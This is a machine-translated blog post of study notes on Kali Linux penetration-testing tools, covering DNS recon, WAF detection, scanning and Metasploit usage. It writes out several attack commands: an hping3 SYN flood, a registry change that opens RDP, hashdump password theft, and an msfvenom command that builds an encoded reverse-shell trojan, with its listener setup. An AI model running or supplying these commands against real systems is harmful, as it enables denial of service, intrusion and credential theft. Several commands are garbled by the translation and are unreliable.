KALI conventional analytical tool notes

Others 2020-03-24 22:56:36 views: null

bettercap  ARP spoofing

 

DNS investigation

dnsmap violence guess solution subdomain

dmitry -wiens -o search.txt baidu.com integrated dns, domain information, subdomain collection set Tools Platform

recon-ng to crack the violence dns subdomain this function well in combination with the best shodan Interface  

 

IPS / IDS identification (Intrusion Detection System)

fragroute www.baidu.com then open the browser will go to the record

lbd baidu.com detection site load balancing situation can only detect nginx now basically been eliminated

wafw00f www.baidu.com waf detection seems not handy

 

Host enumeration

atk6-alive6 etho (NIC) can only scan IPV6 address of the host in the same local area network

msf framework also have this function

set rhosts ipv6 address

use auxiliary/scanner/discovery/ipv6_multicast_ping

show options

run

Teacher recommended useful tool: hping3

hping3 --icmp -c 2 192.168.1.7 routine testing survival network

hping3 -S --flood --rand-source -p 80 192.168.1.7 flooding attacks

-1 ip hping3

nmap 192.168.1.0/24 survival test on the same subnet

 

Ports, servers, services scan (nmap)

 

Fingerprint recognition

System identification

Nmap -You 192.168.0.1

xprobe2  www.freebuf.com  -p tcp:80:open

whatweb   www.freebuf.com

masscan scale and speed of scanning randomly assigned to host this better

masscan 192.168.1.0/24 -p 80 --banners

Integrated tools: sparta Sparta interface tools add ip (segment) to very good

Vulnerability scanning and use framework openvas 

web application attack and audit framework

W3AF installation is not very friendly to run a little card Dayton temporarily do not have much use

msf set of processes

After penetration of important commands: through the registry to add a registry open port 3389: REG ADD HKLM \ SYSTEM \ CurrentControlSet \ Control \ Terminal "" Server / v fDenyTSConnections / t REG_DOWRD / d 00000000 / f

Read the password: search hashdump use a module using the show options set sessions run to obtain the password

Remote Desktop Connection: rdesktop 192.168.0.1:3389

Trojan generation:

-P Msfvenom Windows / Meterpreter / Reverse_tcp -E X86 / Shikata_ga_nai -I 5 LHOST = self-ip LPORT = 4444 -f exe> /root/xiee.exe

Before granting the target host detect what may go online 

Then open the monitor module on the attack machine: msf5> use exploit / multi / handler

Setting payload: the SET payload Windows / Meterpreter / reverse_tcp with the Trojans used to generate almost
set your own listening port: set lport 192.168.188.255
open: run

Armitage

 

 Msf of interface cards Dayton and sometimes may be slow

Guess you like

Origin www.cnblogs.com/Qiuzhiyu/p/12562425.html
Recommended
Ranking
#2019110700005
What materials and procedures are required for patent transfer
What is the blockchain Ethereum triplet state root transaction root receipt root
Front-end study notes 04 --- About the insertion of html pictures and videos
Documents required for the filing of WeChat Mini Programs in special industries, the filing process of WeChat Mini Programs in special industries, how to file WeChat Mini Programs in special industries
2017 Qingdao-site tournament I The Squared Mosquito Coil
[BZOJ3165][HEOI2013]Segment (line segment tree without marking)
Kettle series: KettleEasyExpand, an open source Kettle universal plugin by Ma Jinju
The latest tutorial on making framework for iOS
DAX Section 6: Statistical Functions
Daily
More
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)

Code World

© 2018 codetd.com